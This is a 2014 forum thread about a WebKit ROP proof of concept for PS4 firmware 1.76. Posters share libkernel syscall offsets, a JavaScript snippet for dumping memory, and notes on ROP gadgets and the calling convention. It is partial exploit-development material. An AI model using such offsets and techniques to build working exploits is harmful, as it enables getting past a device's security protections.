Advertising (This ad goes away for registered users. You can Login or Register)

PS4 1.76 Webkit ROP POC

Underground PS4 discussions
Forum rules
Forum rule Nº 15 is strictly enforced in this subforum.
varinek
Posts: 4
Joined: Mon Oct 08, 2012 5:58 am

Re: PS4 1.76 Webkit ROP POC

Post by varinek » Wed Oct 29, 2014 8:09 pm

interesting its working for you :D
Advertising

Takezo
Posts: 14
Joined: Mon Oct 20, 2014 7:05 am

Re: PS4 1.76 Webkit ROP POC

Post by Takezo » Thu Oct 30, 2014 10:22 am

@Nas could you make comments after your gadgets please (pop ...)?
Which calling convention did you use ?
Because it seem that x86_64 use registers for arguments...
Advertising

esperas
Posts: 3
Joined: Thu Oct 30, 2014 5:28 pm

Re: PS4 1.76 Webkit ROP POC

Post by esperas » Thu Oct 30, 2014 5:43 pm

Hi every1 actually im just new to this kind of exploit or hack 2 ps4 and i i never had any experienced in ps3 hack or jailbreak b'coz i d0nt own a ps3 but i got interest in ps4 so i just thought maybe someday in the future it will be hack and. Playstati0n fan i just wanna ask sir, if s0me1 shares me please.... what is the purpose of this webkit dump 4 ps4? And what will happen? Is it safe? Bcoz i just d0nt wanna loose my ps4 it hard 2 buy... but im just wanna try it... and maybe i get relate to topic and share my experience thank you guys...

esperas
Posts: 3
Joined: Thu Oct 30, 2014 5:28 pm

Re: PS4 1.76 Webkit ROP POC

Post by esperas » Thu Oct 30, 2014 5:46 pm

My ps4 v1.76 i will n0t update until theres a new exploit for 2.00 please help me guys....

unknown v2
Posts: 2
Joined: Thu Oct 30, 2014 9:48 pm

Re: PS4 1.76 Webkit ROP POC

Post by unknown v2 » Fri Oct 31, 2014 1:39 am

Takezo wrote: @Nas I found some useful syscall in libkernel
sys_exit = 0xDD50 # + libkernel_base
munmap = 0xC0B0# + libkernel_base
execve = 0xBFF0 # + libkernel_base
How did you find those syscall addresses? Did you dump "libkernel" using this method?

Takezo
Posts: 14
Joined: Mon Oct 20, 2014 7:05 am

Re: PS4 1.76 Webkit ROP POC

Post by Takezo » Fri Oct 31, 2014 7:44 am

Yes i found it with ida pro in my libkernel dump.

Code: Select all

ioctl = 0xBF70 
getlogin = 0xBF10 
fstat = 0xBDD0
fork = 0xB9D0
write = 0xBA10
open = 0xBA30
close = 0xBA50
wait4 = 0xBA70
chroot = 0xC030
mmap = 0xC090
mprotect = 0xC0D0
...

Code: Select all

I replaced <body> in ps4.php by 
<body onload="btnClick()"> (dump onload)

Code: Select all

ps4_rop2.html

makeDumpLink(libkernel_base, chunk, 3, "libkernel_base"); //dump libkernel
makeDumpLink(wk_base+0xB39D7, chunk, 341, "wk_base_offB39D7"); // dump webkit at offset 0xB39D7 (result = dump.bin 37.2 Mo)

function makeDumpLink(offset, sizeDump, nbSeg, nameModule)
{
logAdd("<h2><a href='ps4.php?base=0x" + offset.toString(16) + "&chunk=0x" + sizeDump.toString(16) + "&cnt=0x" + nbSeg.toString(16) + "'>"+nameModule+" "+nbSeg.toString(10) + "</a></h2>");
}

Code: Select all

nas  gadget_arg:
#pop rdi ret
#pop rsi ret
#call why ???
#pop rcx ret
#pop r8  ret
#pop r9  ret

abcdf
Posts: 2
Joined: Fri Oct 31, 2014 3:26 pm

Re: PS4 1.76 Webkit ROP POC

Post by abcdf » Fri Oct 31, 2014 3:29 pm

debug settings in retail ps4 by skfu, but we cant use it :(

Image

anhell28
Posts: 33
Joined: Mon Apr 16, 2012 2:07 am

Re: PS4 1.76 Webkit ROP POC

Post by anhell28 » Fri Oct 31, 2014 3:47 pm

things are getting very interesting for PS4

yifanlu
Guru
Posts: 760
Joined: Sun Mar 11, 2012 6:42 am
Contact:

Re: PS4 1.76 Webkit ROP POC

Post by yifanlu » Fri Oct 31, 2014 7:12 pm

abcdf wrote:debug settings in retail ps4 by skfu, but we cant use it :(
An empty screen. Impressive.

nas
Posts: 10
Joined: Thu Aug 14, 2014 6:35 am

Re: PS4 1.76 Webkit ROP POC

Post by nas » Sat Nov 01, 2014 11:27 am

Takezo wrote:@Nas could you make comments after your gadgets please (pop ...)?
Which calling convention did you use ?
Because it seem that x86_64 use registers for arguments...
calling convention is "System V AMD64 ABI" (see http://en.wikipedia.org/wiki/X86_callin ... onventions).
"pop r** ; ret" for argument 1-6, stack for for 7 and on

Post Reply

Return to “Programming and Security”